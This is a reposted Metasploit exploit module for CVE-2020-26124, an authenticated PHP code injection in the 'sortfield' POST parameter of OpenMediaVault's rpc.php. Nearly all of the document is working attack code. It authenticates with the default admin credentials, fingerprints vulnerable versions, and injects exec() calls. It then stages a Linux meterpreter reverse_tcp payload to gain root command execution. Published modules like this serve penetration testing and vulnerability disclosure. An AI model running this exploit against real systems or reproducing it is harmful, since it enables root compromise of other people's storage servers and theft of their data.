OpenMediaVault rpc.php Authenticated PHP Code Injection

This Metasploit module exploits an authenticated PHP code injection vulnerability found in openmediavault versions before 4.1.36 and 5.x versions before 5.5.12 inclusive in the "sortfield" POST parameter of the rpc.php page, because "json_encode_safe()" is not used in config/databasebackend.inc. Successful exploitation grants attackers the ability to execute arbitrary commands on the underlying operating system as root.


MD5 | 5db0392e6b4ca81a678c8e7564a34918

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
prepend Msf::Exploit::Remote::AutoCheck
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager
def initialize(info = {})
super(
update_info(
info,
'Name' => 'OpenMediaVault rpc.php Authenticated PHP Code Injection',
'Description' => %q{
This module exploits an authenticated PHP code injection
vulnerability found in openmediavault versions before 4.1.36
and 5.x versions before 5.5.12 inclusive in the "sortfield"
POST parameter of the rpc.php page, because "json_encode_safe()"
is not used in config/databasebackend.inc.
Successful exploitation grants attackers the ability to execute
arbitrary commands on the underlying operating system as root.
},
'Author' => [
'Anastasios Stasinopoulos' # @ancst of Obrela Labs Team - Discovery and Metasploit module
],
'References' => [
['CVE', '2020-26124'],
['URL', 'https://www.openmediavault.org/?p=2797']
],
'License' => MSF_LICENSE,
'Platform' => ['unix', 'linux'],
'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
'Payload' => { 'BadChars' => "\x00" },
'DisclosureDate' => 'Sep 28 2020',
'Targets' =>
[
[
'Automatic (Linux Dropper)',
'Platform' => 'linux',
'Arch' => [ARCH_X86, ARCH_X64],
'DefaultOptions' => { 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp' },
'Type' => :linux_dropper
]
],
'Privileged' => false,
'DefaultTarget' => 0
)
)
register_options(
[
OptString.new('TARGETURI', [true, 'The URI path of the OpenMediaVault installation', '/']),
OptString.new('USERNAME', [true, 'The OpenMediaVault username to authenticate with', 'admin']),
OptString.new('PASSWORD', [true, 'The OpenMediaVault password to authenticate with', 'openmediavault'])
]
)
end

def user
datastore['USERNAME']
end

def pass
datastore['PASSWORD']
end

def login(user, pass, _opts = {})
print_status("#{peer} - Authenticating with OpenMediaVault using #{user}:#{pass}...")
@uri = normalize_uri(target_uri.path, '/rpc.php')
res = send_request_cgi({
'uri' => @uri,
'method' => 'POST',
'ctype' => 'application/json',
'data' => {
"service": 'Session',
"method": 'login',
"params": {
"username": user.to_s,
"password": pass.to_s
},
"options": nil
}.to_json
})
unless res
# We return nil here, as callers should handle this case
# specifically with their own unique error message.
return nil
end

if res.code == 200 && res.body.scan('"authenticated":true,').flatten.first && res.get_cookies.scan(/X-OPENMEDIAVAULT-SESSIONID=(\w+);*/).flatten.first
@cookie = res.get_cookies
end
return res
rescue ::Rex::ConnectionError
print_error('Rex::ConnectionError caught in login(), could not connect to the target.')
return nil
end

def get_target
print_status("#{peer} - Trying to detect if target is running a supported version of OpenMediaVault.")
res = send_request_cgi({
'uri' => @uri,
'method' => 'POST',
'cookie' => @cookie.to_s,
'data' => {
"service": 'System',
"method": 'getInformation',
"params": nil,
"options": {
"updatelastaccess": false
}
}.to_json
})
version = res.body.scan(/"version\":\"(\d.\d.{0,1}\d{0,1}.{0,1}\d{0,1})/).flatten.first
if version.nil?
print_error("#{peer} - Unable to grab version of OpenMediaVault installed on target!")
return nil
end
print_good("#{peer} - Identified OpenMediaVault version #{version}.")
version_gemmed = Gem::Version.new(version)
if version_gemmed < Gem::Version.new('3.0.1')
return version
elsif version_gemmed >= Gem::Version.new('4.0.0') && version_gemmed < Gem::Version.new('4.1.36')
return version
elsif version_gemmed >= Gem::Version.new('5.0.0') && version_gemmed < Gem::Version.new('5.5.12')
return version
else
return nil
end

return version
end

def execute_command(cmd, _opts = {})
send_request_cgi({
'uri' => @uri,
'method' => 'POST',
'cookie' => @cookie.to_s,
'data' => {
"service": 'LogFile',
"method": 'getList',
"params": {
"id": 'apt_history',
"start": 0,
"limit": 50,
"sortfield": "'.exec(\"#{cmd}\").'",
"sortdir": 'DESC'
},
"options": nil
}.to_json
})
rescue ::Rex::ConnectionError
fail_with(Failure::Unreachable, 'Rex::ConnectionError caught in execute_command(), could not connect to the target.')
end

def check
res = login(user, pass)
unless res
return CheckCode::Unknown("No response was received from #{peer} whilst in check(), check it is online and the target port is open!")
end

if @cookie.nil?
return Exploit::CheckCode::Unknown("Failed to authenticate with OpenMediaVault on #{peer} using #{user}:#{pass}")
end

print_good("#{peer} - Successfully authenticated with OpenMediaVault using #{user}:#{pass}.")
version = get_target
if version.nil?
# We don't print out an error message here as returning this will
# automatically cause Metasploit to print out an appropriate error message.
return CheckCode::Safe
end

delay = rand(7...15)
cmd = "\").usleep(#{delay}0000).(\""
print_status("#{peer} - Verifying remote code execution by attempting to execute 'usleep()'.")
t1 = Time.now.to_i
res = execute_command(cmd)
t2 = Time.now.to_i
unless res
print_error("#{peer} - Connection failed whilst trying to perform the code injection.")
return CheckCode::Detected
end
diff = t2 - t1
if diff >= 3
print_good("#{peer} - Response received after #{diff} seconds.")
return CheckCode::Vulnerable
end
print_error("#{peer} - Response wasn't received within the expected period of time.")
return CheckCode::Safe
rescue ::Rex::ConnectionError
print_error("#{peer} - Rex::ConnectionError caught in check(), could not connect to the target.")
return CheckCode::Unknown
end

def exploit
print_status("#{peer} - Sending payload (#{payload.encoded.length} bytes)...")
execute_cmdstager(linemax: 130_000)
rescue ::Rex::ConnectionError
print_error('Rex::ConnectionError caught in exploit(), could not connect to the target.')
return false
end

end

Related Posts